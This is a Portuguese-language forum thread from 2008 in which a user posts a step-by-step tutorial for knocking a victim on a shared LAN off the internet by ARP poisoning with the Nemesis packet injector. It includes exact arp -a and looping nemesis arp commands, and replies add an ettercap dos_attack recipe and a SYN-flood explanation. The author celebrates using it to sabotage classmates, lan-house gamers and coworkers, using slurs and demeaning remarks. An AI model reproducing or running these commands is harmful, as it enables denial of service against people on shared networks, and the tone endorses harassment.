Yehpinho
{Neste tópico você irá aprender como negar o serviço de internet à um computador de uma mesma rede local (LAN).}
# Não, neste tópico você não irá aprender a técnica rakuda do Ping of Death. Você irá aprender (eu acho) como negar o acesso de um computador "vítima" à rede exterior (internet) por meio do nemesis.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Todo computador em uma rede (LAN) troca informações e acessa a internet através de um roteador certo? Quando este computador acessa o router, o mesmo checa seu endereço IP e traduz à uma verificação certa de endereço MAC. Tudo isso através do protocolo ARP.
««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
Acesso do computador à rede externa → Checagem de IP e tradução do MAC Adress com protocolo ARP → Resposta de acesso »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
Já ouviu falar em envenenamento ARP?
Praticando !
É simples os procedimentos. Por sinal bem simples e divertido!
Bem primeiro precisamos de algumas ferramentas para ambiente windows (por ser o mais pop).
Nemesis Injection Packet ↓
http://www.packetfactory.net/projects/nemesis/
E também temos que saber que:
Meu IP: 168.0.0.13
IP do meu colega: 168.0.0.24
Router: 168.0.0.8
Praticando² !
Bem, vocês devem estar se perguntando: como que eu vou saber todos esses ip's se eu nem sei o que é traceroute/tracert?
→Simples amiguênho. Com alguma sorte ou lábia obtenha acesso à esses computadores (a(as) vítmas e ao seu computador) e lá descubra os respectivos ip's (para uma vítima em especial) ou no DOS mande um simples ping (para uma vítima qualquer). Lembrando que em qualquer método, o primeiro ip é o do roteador.
→Depois que voce selecionou a vítima ( ip 168.0.0.24), deve-se saber o endereço MAC. Para isso no seu terminal de comandos windons, digite arp -a e então se aparecerá uma tabeça com muitos ip's e seus endereços MAC's. Localize o ip 168.0.0.24 e anote seu endereço MAC.
C:\Aluno13\> arp -a
Direção IP Direção física Tipo
168.0.0.8 00-c0-3c-44-a1-d1 dinâmico
168.0.0.24 00-7f-14-b0-76-6f dinâmico
C:\Aluno13\>
Depois de tudo anotado chegou a hora de injetar pacotes :D
A sintaxe de execução modelo é esta: nemesis arp -D IPvítima -S IProuter -H MACrouter
C:\Aluno13\> nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF
ARP Packet Injected
C:\Aluno13\>
Bem, logo depois de injetar pacotes na máquina alvo, vai da para perceber que a conexão do coleguinha caiu pela cara dele com certeza hehe. Mas, você sabia que depois de um tempo a conexão volta (siim, windows ñ é tao ruim assim) ? Para isso não acontecer, acrescente FOR /L %i IN (1,1,5000) DO, fcando assim:
C:\Aluno13\> FOR /L %i IN (1,1,5000) DO nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF
ARP Packet Injected
C:\Aluno13\>
C:\Aluno13\> FOR /L %i IN (1,1,5000) DO nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF
ARP Packet Injected
C:\Aluno13\>
C:\Aluno13\> FOR /L %i IN (1,1,5000) DO nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF
ARP Packet Injected
C:\Aluno13\>
...e vai ficar repetindo muitas e muitas e muitas vezes.
Aih voce me pergunta, que utilidade tem uma coisa dessas? Muitas, interromper o trabalho escolar by google daquele grupo que tem os viadinhos e as meninas feias e chatas da escola (que nem eu fiz), atrasar alguma pesquisa, deixar algum cara cheio de raiva em uma lan house (isso é otimo quando o cara está jogando tibia), tirar a diversão do seu colega de trabalho de algum site de muié pelada ou simplesmente, não ter nada para fazer!
Flw'sz
=)
Já ouvi isso a muito tempo, conhecia como arp neg mas nunca tinha visto realmente, não testei, tu sabe o que o nemesis faz?
que tipo de protocolo ele usa?
alguma dica que possa me ajudar a fazer-lo no linux?
grato!
by KEst
S3.nD meu caro, se eu pudesse eu lhe daria um Ponto positivo, mais como não tenho esse "poder" ficarei lhe devendo hehe...
Não conhecia esse metodo, e olhe que eu sempre quis saber algo parecido, mais a preguiça não deixava eu ir ao nosso querido google pesquisar xD
Execelente artigo, muito bem explicado, parabéns S3.nD!!!
Citação de: KEst online 12 de Outubro , 2008, 08:51:48 AM
Já ouvi isso a muito tempo, conhecia como arp neg mas nunca tinha visto realmente, não testei, tu sabe o que o nemesis faz?
que tipo de protocolo ele usa?
alguma dica que possa me ajudar a fazer-lo no linux?
grato!
by KEst
Nemesis é um injetor de pacotes e por usar protocolos de transferencia, acredito eu que ele trabalha na arquitetura tcp/ip.
No linux cara, uma vez já vi em um outro fórum mas não lembro muito bem o nome do programa. Uso linux também mas fiz este tutorial em ambiente windows por eu ter mais contato com uma rede windows e não com uma rede linux.
Flw'sz
=)
Citação de: Joey online 12 de Outubro , 2008, 10:20:29 AM
S3.nD meu caro, se eu pudesse eu lhe daria um Ponto positivo, mais como não tenho esse "poder" ficarei lhe devendo hehe...
Não conhecia esse metodo, e olhe que eu sempre quis saber algo parecido, mais a preguiça não deixava eu ir ao nosso querido google pesquisar xD
Execelente artigo, muito bem explicado, parabéns S3.nD!!!
huahuahuahuahuhauhauhau
Agora você já sabe, e o melhor jeito de aprender de verdade é praticando ;)
E muito obrigado pelos elogios, são eles que dão motivos para próximos artigos ::)
Flw'sz
=)
Estou gostando da qualidade dos seus post amigo S3.nD!!!
Ótimo post!
Deixe o sistema de pontuação voltar que você terá um Ponto Positivo já... ;)
Citação de: DarkSpawn online 14 de Outubro , 2008, 09:08:01 AM
Estou gostando da qualidade dos seus post amigo S3.nD!!!
Ótimo post!
Deixe o sistema de pontuação voltar que você terá um Ponto Positivo já... ;)
:D :D :D
Muito obrigado DarkSpawn, fico muito grato!!
Flw'sz
=)
Para os "linuxers" de plantão sera mais pratico e rapido usar novamente o ettercap.
#ettercap -T -q -M ARP //
Depois aperte "p" e digite em baixo:
"dos_attack"
Depois digite o IP da vítima e logo em baixo um IP invalido na rede
Pronto, ele fara um "ataque DOS na rede local"
8) MUITO BACANA...aprendo a cada dia....continue participando...e lembre-se dia 13 a partir das 13:00hrs tem quebra do record de usuários online no Darkers...vc será bem vindo....abraços...♣
belo tutorial ;d
eu ja trampei em lan house, quando alguem enchia muito o saco, fazia isso; rs
o link para baixar o arquivo esta quebrado!
mais gostei do tutorial.
peso desculpas pela ignorância, mais q estou entrado agora nesta area...mais gosto muito!
por isso tenho uma duvida sobre a instalação dele, dei uma procurada no google. é achei o "nemesis-1.4"
quando eu abro a pasta, tem vários arquivos eh .txt
é um .exe
clico nele, e a mensagem aparece
"este aplicativo não pode ser iniciado porque não foi encontrado packet.dll. a reinstalação do aplicativo pode corrigir o problema"
o que faço?
o que estou fazendo de errado?
tenho que ter algum compilador?? dev c++ etc...
uso XP
obrigado
Muito bom esse tópico :D :D :D
Para você DOGN:
Procure por essa dll(packet.dll) na internet>baixe-a>e coloque-a no diretório que está o programa.
bom fis como vc mandou!
mais outra mensagem apareceu:
"não foi possível o ponto de entrada do procedimento PacketGetNetinfo na biblioteca de viculo Dinãmico packet.all"
baixei a dll de varios lugares...o mais o erro continua..
o que eu faço?
obrigado pela ajuda.
Agora o erro está na *.dll,rsrsrs :D :D :D;essa *.dll não é pra esse programa.O certo é ela vir junto com o *.exe,já que é uma dependência dele.
Não consigo te ajudar nessa :(
o PhP q eu baixei deu a mesma merda :'(
Ficou faltando a explicação sobre o funcionamento desse ataque!
Segue o trecho da documentação do ettercap sobre o assunto:
Citar
dos_attack
This plugin runs a d.o.s. attack against a victim IP address. It first "scans" the victim to find open
ports, then starts to flood these ports with SYN packets, using a "phantom" address as source IP.
Then it uses fakeARP replies to intercept packets for the phantom host. When it receivesSYN-
ACKfrom the victim, it replies with an ACK packet creating an ESTABLISHED connection. You
have touse a free IP address in your subnet to create the "phantom" host (you can use find_ip for
this purpose). Youcan'trun this plugin in unoffensive mode.
This plugin is based on the original Naptha DoS attack (http://razor.bindview.com/publish/advi- (http://razor.bindview.com/publish/advi-)
sories/adv_NAPTHA.html)
example :
ettercap -TQP dos_attack
Basicamente o que ele faz é executar um Syn Flood na vítima. Pra quem quiser saber mais sobre Syn Floods, segue um artigo sobre o assunto:
http://blog.codebunker.org/?p=21 (http://blog.codebunker.org/?p=21)
Abração